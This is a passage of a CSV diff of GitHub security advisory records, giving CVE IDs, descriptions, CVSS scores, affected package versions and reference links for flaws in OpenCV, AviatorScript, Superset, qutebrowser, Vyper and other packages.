+1.4.0,GHSA-xpv2-8ppj-79hh,2021-10-08T21:30:48Z,2021-10-04T20:14:31Z,,['CVE-2021-41862'],Expression injection in AviatorScript,AviatorScript through 5.2.7 allows code execution via an expression that is encoded with Byte Code Engineering Library (BCEL).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.googlecode.aviator:aviator'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41862'}, {'type': 'WEB', 'url': 'https://github.com/killme2008/aviatorscript/issues/421'}, {'type': 'PACKAGE', 'url': 'https://github.com/killme2008/aviatorscript'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-04T16:58:38Z', 'nvd_published_at': '2021-10-02T00:15:00Z'}"
+1.4.0,GHSA-6v6p-p97v-g2p7,2021-11-18T15:32:35Z,2021-10-12T22:01:44Z,,['CVE-2017-12603'],Out-of-bounds Write in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an invalid write in the cv::RLByteStream::getBytes function in modules/imgcodecs/src/bitstrm.cpp when reading an image file by using cv::imread, as demonstrated by the 2-opencv-heapoverflow-fseek test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12603'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T21:00:22Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-pfwg-rxf4-97c3,2022-06-01T22:01:45Z,2021-10-06T17:47:53Z,,['CVE-2021-28125'],Open Redirect in Apache Superset,Apache Superset prior to 1.1.0 allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.34.0'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'apache-superset'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28125'}, {'type': 'WEB', 'url': 'https://github.com/apache/superset/commit/eb35b804acf4d84cb70d02743e04b8afebbee029'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-pfwg-rxf4-97c3'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/superset'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/apache-superset/PYSEC-2021-128.yaml'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434%40%3Cdev.superset.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r89b5d0dd35c1adc9624b48d6247729c73b2641b32754226661368434@%3Cdev.superset.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/04/27/2'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T14:11:38Z', 'nvd_published_at': '2021-04-27T10:15:00Z'}"
+1.4.0,GHSA-5fvx-5p2r-4mvp,2021-10-25T20:08:26Z,2021-10-21T17:48:41Z,,['CVE-2021-3851'],Open Redirect in firefly-iii,firefly-iii is vulnerable to URL Redirection to Untrusted Site ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3851'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/8662dfa4c0f71efef61c31dc015c6f723db8318d'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/549a1040-9b5e-420b-9b80-20700dd9d592'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-20T16:06:15Z', 'nvd_published_at': '2021-10-19T13:15:00Z'}"
+1.4.0,GHSA-84g3-cv89-m9gm,2021-10-06T22:34:42Z,2021-10-13T15:33:20Z,,['CVE-2021-25916'],Prototype pollution vulnerability in 'patchmerge',Prototype pollution vulnerability in 'patchmerge' versions 1.0.0 through 1.0.1 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'patchmerge'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25916'}, {'type': 'WEB', 'url': 'https://github.com/pjshumphreys/patchmerge/commit/5b383c537eae7a00ebd26d3f7211dac99ddecb12'}, {'type': 'PACKAGE', 'url': 'https://github.com/pjshumphreys/patchmerge'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25916'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T22:34:42Z', 'nvd_published_at': '2021-03-16T16:15:00Z'}"
+1.4.0,GHSA-c7gp-2pch-qh2v,2021-11-18T15:33:02Z,2021-10-12T22:01:55Z,,['CVE-2017-12604'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the FillUniColor function in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12604'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:57:19Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-xv8x-pr4h-73jv,2021-10-18T16:33:54Z,2021-10-12T15:59:29Z,,['CVE-2021-41121'],Memory corruption when returning a literal struct with a private call inside of it,"### Impact
+
+When performing a function call inside a literal struct, there is a memory corruption issue that occurs because of an incorrect pointer to the the top of the stack.
+
+### Patches
+0.3.0 / #2447
+
+*","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-xv8x-pr4h-73jv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41121'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2447'}, {'type': 'PACKAGE', 'url': 'https://github.com/vyperlang/vyper'}]","{'cwe_ids': ['CWE-119'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:47:24Z', 'nvd_published_at': '2021-10-06T18:15:00Z'}"
+1.4.0,GHSA-vw27-fwjf-5qxm,2021-10-21T20:46:42Z,2021-10-22T16:20:10Z,,['CVE-2021-41146'],Arbitrary command execution on Windows via qutebrowserurl: URL handler,"### Impact
+Starting with qutebrowser v1.7.0, the Windows installer for qutebrowser registers it as a handler for certain URL schemes. With some applications such as Outlook Desktop, opening a specially crafted URL can lead to argument injection, allowing execution of qutebrowser commands, which in turn allows arbitrary code execution via commands such as `:spawn` or `:debug-pyeval`.
+
+Only Windows installs where qutebrowser is registered as URL handler are affected. It does *not* have to be set as default browser for the exploit to work.
+
+### Patches
+The issue has been fixed in [qutebrowser v2.4.0](https://github.com/qutebrowser/qutebrowser/releases/tag/v2.4.0) in commit 8f46ba3f6dc7b18375f7aa63c48a1fe461190430.
+
+The fix also adds additional hardening for potential similar issues on Linux (by adding the new `--untrusted-args` flag to the `.desktop` file), though no such vulnerabilities are known.
+
+Backported patches for older versions are available, but no further releases are planned:
+
+- v1.7.x: d1ceaab
+- v1.8.x: ca7155d
+- v1.9.x: 157d871
+- v1.10.x: 94a6125
+- v1.11.x: 10acfbb
+- v1.12.x: 363a18f
+- v1.13.x: 410f262
+- v1.14.x: e4f4d93
+- v2.0.x: 15a1654
+- v2.1.x: 509ddf2
+- v2.2.x: 03dcba5
+- v2.3.x: 00a694c
+
+(commits are referring to qutebrowser/qutebrowser on GitHub)
+
+### Workarounds
+Remove qutebrowser from the default browser settings entirely, so that it does not handle any kind of URLs. Make sure to remove *all* handlers, including an (accidental) `qutebrowserURL` handler, e.g. using [NirSoft URLProtocolView](https://www.nirsoft.net/utils/url_protocol_view.html).
+
+### Timeline
+2021-10-15: Issue reported via security@qutebrowser.org by Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group (VXRL)](https://www.vxrl.hk/)
+2021-10-15: Issue confirmed by @The-Compiler (lead developer), author of installer (@bitraid) contacted for help/review
+2021-10-15: CVE assigned by GitHub
+2021-10-15 to 2021-10-17: Fix developed
+2021-10-17: Additional core developer (@toofar) contacted for help/review
+2021-10-21: v2.4.0 released containing the fix
+2021-10-21: Advisory and fix published
+
+### References
+See the [commit message](https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430) for additional information and references to various similar issues in other projects.
+
+### Acknowledgements
+Thanks to Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group](https://www.vxrl.hk/) (VXRL/@vxresearch) for finding and responsibly disclosing this issue.
+
+### Contact
+If you have any questions or comments about this advisory, please email [security@qutebrowser.org](mailto:security@qutebrowser.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'qutebrowser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41146'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430'}, {'type': 'PACKAGE', 'url': 'https://github.com/qutebrowser/qutebrowser'}]","{'cwe_ids': ['CWE-641', 'CWE-77', 'CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T20:46:42Z', 'nvd_published_at': '2021-10-21T18:15:00Z'}"
+1.4.0,GHSA-pqjj-6f5q-gqph,2021-10-08T14:35:41Z,2021-10-12T22:01:34Z,,['CVE-2017-12602'],Denial of Service in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (memory consumption) issue, as demonstrated by the 10-opencv-dos-memory-exhaust test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12602'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9311'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:35:41Z', 'nvd_published_at': None}"
+1.4.0,GHSA-8w3x-457r-wg53,2021-11-18T00:08:10Z,2021-10-12T22:00:41Z,,['CVE-2017-12597'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to opencv-python and opencv-contrib-python through 3.3.0.9) has an out-of-bounds write error in the function FillColorRow1 in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12597'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T17:28:40Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-vc29-rj92-gc7j,2021-11-18T15:33:38Z,2021-10-12T22:02:12Z,,['CVE-2017-12606'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the function FillColorRow4 in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12606'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:49:52Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-fw99-f933-rgh8,2021-10-07T15:09:42Z,2021-10-12T22:09:31Z,,['CVE-2019-14492'],Out-of-bounds Read and Out-of-bounds Write in OpenCV,"An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 4.1.1.26). There is an out of bounds read/write in the function HaarEvaluator::OptFeature::calc in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14492'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15124'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T15:09:42Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}"
+1.4.0,GHSA-xrpj-f9v6-2332,2021-10-18T19:08:54Z,2021-10-04T20:12:45Z,2021-10-18T19:05:16Z,[],CSV injection in Craft CMS,"# Withdrawn
+
+Duplicate of GHSA-h7vq-5qgw-jwwq","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41824'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c9cb2225f1b908fb1e8401d401219228634b26b2'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28'}, {'type': 'WEB', 'url': 'https://twitter.com/craftcmsupdates/status/1442928690145366018'}]","{'cwe_ids': ['CWE-1236', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T19:01:45Z', 'nvd_published_at': None}"
+1.4.0,GHSA-fr26-qjc8-mvjx,2021-10-13T17:45:05Z,2021-10-13T18:56:12Z,,[],"Possible route enumeration in production mode via RouteNotFoundError view in Vaadin 10, 11-14, and 15-19","Improper sanitization of path in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for `NotFoundException` is provided.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.6.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '6.0.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-fr26-qjc8-mvjx'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31412'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:45:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-w96g-3p64-63wr,2021-11-18T00:06:27Z,2021-10-12T22:01:23Z,,['CVE-2017-12601'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV ,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a buffer overflow in the cv::BmpDecoder::readData function in modules/imgcodecs/src/grfmt_bmp.cpp when reading an image file by using cv::imread, as demonstrated by the 4-buf-overflow-readData-memcpy test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12601'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-119', 'CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:40:39Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}"
+1.4.0,GHSA-m6vm-8g8v-xfjh,2022-04-20T19:15:08Z,2021-10-12T22:23:13Z,,['CVE-2019-5063'],Out-of-bounds Write in OpenCV,"An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0 (corresponds with OpenCV-Python 4.1.0.25). A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 